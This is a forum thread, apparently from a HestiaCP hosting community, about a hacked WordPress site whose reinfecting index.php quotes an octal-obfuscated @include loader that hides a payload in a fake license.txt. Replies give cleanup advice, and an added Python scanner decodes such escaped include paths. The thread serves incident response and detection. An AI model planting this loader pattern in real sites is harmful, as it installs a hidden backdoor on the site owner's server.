Hello, good day. A few days ago I experienced an attack on my website… I was able to retrieve it by deleting the code that was inserted in the .htaccess

The main issue I was facing is that there is an index.php file the hacker uploaded… I've been trying to delete it but it kept on coming back… I think he has changed the permission to read-only… Someone should help with a solution. Thanks

Below is the code in the index.php file:

<?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?> <?php define( 'WP_USE_THEMES', true ); require __DIR__ . '/wp-blog-header.php';
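The include path in the line quoted above is written with PHP octal escapes; decoded, it reads `wp-includes/images/license.txt`, so that file is what the include loads and it belongs on the list of files to inspect. The following script is an added example, not part of the original post: it decodes such escaped include paths and can walk a document root for others like it. The function names are this example's own.

```python
import re
import sys
from pathlib import Path

# PHP double-quoted strings accept \NNN (octal) and \xHH (hex) byte escapes.
ESCAPE = re.compile(r"\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})")
# include/require (optionally @-silenced or _once) of a double-quoted literal.
INCLUDE = re.compile(
    r"@?\b(?:include|require)(?:_once)?\s*\(?\s*\"((?:[^\"\\]|\\.)*)\"", re.I)

def decode_php_escapes(literal: str) -> str:
    """Resolve octal and hex escapes the way PHP does inside "..."."""
    def repl(m):
        code = int(m.group(1), 8) if m.group(1) else int(m.group(2), 16)
        return chr(code & 0xFF)  # PHP keeps only the low byte
    return ESCAPE.sub(repl, literal)

def find_obfuscated_includes(source: str):
    """Return (raw, decoded) for every include whose path hides behind escapes."""
    hits = []
    for m in INCLUDE.finditer(source):
        raw = m.group(1)
        if ESCAPE.search(raw):
            hits.append((raw, decode_php_escapes(raw)))
    return hits

def scan_tree(root: str):
    """Walk a document root and report (file, decoded path) pairs."""
    report = []
    for path in Path(root).rglob("*.php"):
        text = path.read_text(errors="replace")
        for _, decoded in find_obfuscated_includes(text):
            report.append((str(path), decoded))
    return report

# The injected line quoted in the post above, used as sample input.
SAMPLE = r'''<?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?>'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file, decoded in scan_tree(sys.argv[1]):
            print(f"{file}: includes {decoded}")
    else:
        for raw, decoded in find_obfuscated_includes(SAMPLE):
            print(decoded)
```

Run without arguments it decodes the sample line; given a directory it lists every PHP file containing an escaped include path and what that path decodes to.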

Most likely there is a function somewhere else, in another file, that updates the index.php every x minutes / hours.

If it is WordPress:

Install Wordfence and run it.

Thanks, I’m using Wordfence already, but the file refuses to be deleted.

Deleting alone would probably not be enough; you need to find out where it came from.

Use ssh and root, so you’ll be able to remove every file.

There are more infected files.

Reinstall WordPress, themes and all the plugins.

Then change permissions of all PHP files to 400 and wait to see if it reinfects.

Check the database too for new admin users.

Thanks for the swift response. I don’t know how to log in via SSH.

Give me a hint on how to check the database for a new admin user.

Then you should clearly not use Hestia… With Hestia, you run a webserver on your own. This is not the same as web hosting; it needs knowledge, of which how to use SSH is the first piece needed. We can’t provide support for such cases, according to "Please read this, before you start!".

You should consider getting help from a sysadmin.

I understand you… When I tried to log in via SSH it said access denied.

I was able to solve the issue. Thanks

Please, how did you resolve the issue?

Try this first.

Try resetting your root user password

Don’t forget to reset your root password but remember.

If someone got in and has your root password you should reinstall the OS and start over again.

It is more likely that the hacker has found a vulnerable WordPress plugin and that he has limited access to your system.

Besides changing passwords, you have to CLEAN the infection and PATCH the entrance so you can’t be hacked again tomorrow by the same guy.

That’s why I am saying that it is important to reinstall WordPress, themes and plugins and to write-protect all PHP files and see if you get infected again.

Yes, thanks… The same issue happened recently… I’m trying to set up a new HestiaCP where I can have the admin access… But I need help on how to make sure my files & database are moved to the new panel… So I can be safe from the hacker.

Since you don’t know how he gets in, how would things be different this time?

You will make a clean install, make a new WordPress, install the same vulnerable plugins and have the same hole and then you will be hacked again and again.

First you have to know how the hacker gets in, then you patch and clean and then you consider reinstalling your OS.

Unless you are going to patch again.

Don’t take a backup of an infected website to restore it again since you will be backing up the backdoors too.

Thanks… The developer that helped me migrate has the admin HestiaCP access… He should be behind the attack; that’s why I need to create my own HestiaCP from scratch. So I need to know what to do to make my files safe…

I think it is easier to make a new install and not migrate anything.

  • If it is an unknown hacker you would be bringing his back doors with you.
  • If it is the guy that helped you with the migration, what makes you think that he hasn’t a backdoor that you won’t be moving with the backup?

I’m just confused… Won’t making a new installation make me lose all my files?

That’s why you back them up first… But please be informed that Hestia isn’t a replacement for sysadmin knowledge and we can’t provide support due to the lack of it. This isn’t the idea behind this forum or Hestia itself.